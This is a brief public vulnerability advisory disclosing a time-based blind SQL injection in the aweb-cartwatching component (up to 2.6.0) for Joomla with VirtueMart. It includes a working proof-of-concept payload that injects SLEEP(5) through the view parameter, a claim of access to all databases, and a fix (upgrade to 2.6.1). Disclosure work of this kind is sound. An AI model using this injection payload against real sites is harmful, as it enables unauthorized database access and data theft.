24 lines
No EOL
1.1 KiB
Text
24 lines
No EOL
1.1 KiB
Text
# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0
|
|
# Date: 28-12-2016
|
|
# Software Link: http://awebsupport.com/products/aweb-cartwatching-system
|
|
# Exploit Author: Javi Espejo(qemm)
|
|
# Contact: http://twitter.com/javiespejo
|
|
# Website: http://raipson.com
|
|
# CVE: REQUESTED
|
|
# Category: webapps
|
|
|
|
1. Description
|
|
|
|
Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave
|
|
This the code that has the parameters with the parameters not sanitized
|
|
|
|
2. Proof of Concept
|
|
|
|
option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries.
|
|
|
|
3. Solution:
|
|
|
|
Update to version 2.6.1 from the update center of joomla.
|
|
The Joomla vel publish the vulnerability on
|
|
Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0
|
|
http://awebsupport.com/ |